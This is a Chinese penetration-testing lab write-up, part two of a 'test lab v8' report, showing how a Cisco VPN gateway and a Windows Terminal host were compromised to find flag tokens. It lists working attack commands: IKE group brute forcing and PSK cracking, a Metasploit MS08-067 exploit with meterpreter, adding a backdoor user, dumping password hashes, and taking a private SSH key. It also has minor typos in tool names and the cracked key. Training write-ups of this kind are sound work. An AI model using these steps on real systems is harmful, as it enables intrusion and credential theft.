这是test lab v8报告的第二部分,在第一部分中我们通过网关192.168.101.6攻破了两个系统网站和Cabinet。在这一部分,我们将看到如何通过网关192.168.101.7找到Cisco设备和Terminal系统的token。

攻击CISCO:
我们用nmap扫描网关,使用下面的命令:
nmap -sS -sV -Pn -p1-65535 192.168.101.7

Nmap找到了两个开放的端口,SSH和HTTP,我们使用浏览器访问IP和8100端口,加载了一个e-mail应用程序。我们在攻击Site和Cabinet系统时找到了一个有效的登录凭证,Ralph Westfall的账户。我们尝试使用该凭证(RalphWestfall@sas bank.lab / freeman)登录,发现成功登录了。

登录之后,我们查看所有的邮件,发现了一个感兴趣的东西:VPN密码。

如果我们看一下网络拓扑图,就会发现那里有一个网络设备Cisco路由器。现在我们尝试访问VPN网络,为了达到这个目的,我么需要两个工具IKEforce和IKEscan。使用下面的命令执行IKEscan。
sudo ike-scan -M –id=test -A 192.168.101.7
在命令中,-M表示输出可读信息,—A表示主动模式,-id是一个运行此工具必须的随机的组名。

从上面的截屏中我们可以得到下列信息:
    Enc=3DES
    Hash=SHA1
    Group=2:modp1024
    Auth=psk
现在,我们用IKEforce来枚举出有效的VPN组名。我们将使用IKEforce的默认字典暴力猜解组名,命令如下:
 sudo ./ikeforce.py 192.168.101.7 -e -w -wordlists/groupnames.dic -t 5 2 1 2
在命令中,-t参数指定加密类型、hash类型,组以及认证方法,这些我们用IKEscan已经获取了。在该工具的帮助文档中有一个表,如下:

在运行完这个工具后,我们发下了正确的组id,就是:vpn。

现在,我们有了正确的组id,我们再次运行ike-scan工具,抓取PSK握手消息,使用下面的命令:
sudo ike-scan -M –id=vpn -A 192.168.101.7 -Pcapture.psk

在运行完之后,我们得到了一个capture.psk文件。

现在我们将尝试暴力破解psk文件。在IKEscan工具包中有一个psk-crack工具。我们使用下面的命令来暴力破解。
psk-crak -d /usr/share/wordlists/rockyou.txt capture.psk

如上图所示,我们发现了正确的key,它就是:cicsc123。
现在我们有了连接VPN相关的资料,我们掌握了下面的信息:
    Gateway IP – 192.168.101.7
    IPSec ID – vpn
    IPSec secret -cisco123
    Username – westfall
    Password – AiWa8ahk
我们尝试使用vpnc连接,如下图所示,成功连上了Cisco设备。

为了确认是否可以连接互联网,我们ping谷歌,ping不通。但是当尝试ping谷歌的IP时得到了响应。

这好像是DNS解析的问题,因此打开了/etc/resolv.conf来寻找问题,我们在那儿找到了Token。

攻击TERMINAL:
我们现在可以连上VPN了,所以可以攻击在另一个网络中的机器TERMINAL。在运行工具之前,我们需要确认自己已经连上了Cisco VPN,使用nmap进行端口扫描,命令如下:

nmap -sS -sV -Pn -A 192.168.0.2

通过查看端口,这个系统好像有著名的netapi漏洞。445端口开放,运行着samba服务,这很容易被远程攻击。我们在Metasploit上执行下面命令:
   use exploit/windows/smb/ms08_067_netapi
    set payload windows/meterpreter/bind_tcp
    set RHOST 192.168.0.2
    exploit

漏洞利用很顺利,现在我们有了一个meterpreter会话。我们使用一个post漏洞利用模块,它会在系统上增加一个用户,命令如下:
run getgui -u test -p test

TEST LAB V8(二):Cisco设备和Terminal系统


现在我们可以使用test/test登录Terminal系统了。

TEST LAB V8(二):Cisco设备和Terminal系统


一旦我们登录进系统,就要开始寻找token文件了,Start->Administrative Tools->Computer Management,单击 Local Users and Groups->Users,在westfall的账号描述中找到了token。

TEST LAB V8(二):Cisco设备和Terminal系统


我们的工作到现在还没有终止,无论什么时候攻破了什么系统,要浏览整个系统,寻找能帮我们攻下网络中其它系统的文件和信息。正如下面看到的,系统中有很多的用户,或许其中的一些用户可以用来登录其它系统,所以我们使用meterprter获取所有用户的hash,命令为:
run hashdump

TEST LAB V8(二):Cisco设备和Terminal系统


把所有的hash拷贝到一个text文件中,然后使用Ophcrack工具破解,我们使用XP fast和XP small表,下面是hash的破解结果:

我们在westfall的桌面上找到了一个ppk文件,是由Putty生成的。

把ppk文件拷贝到我们的本地系统。现在我们需要把ppk文件转换为OpenSSH的格式,为此需要使用Puttygen工具,打开该工具然后点击load。

选择ppk文件,然后选择Conversions>Export OpenSSH key

在输出信息中,我们能够得到SSH的私钥。

TEST LAB V8(二):Cisco设备和Terminal系统


现在,终于完成了对Terminal系统的攻击。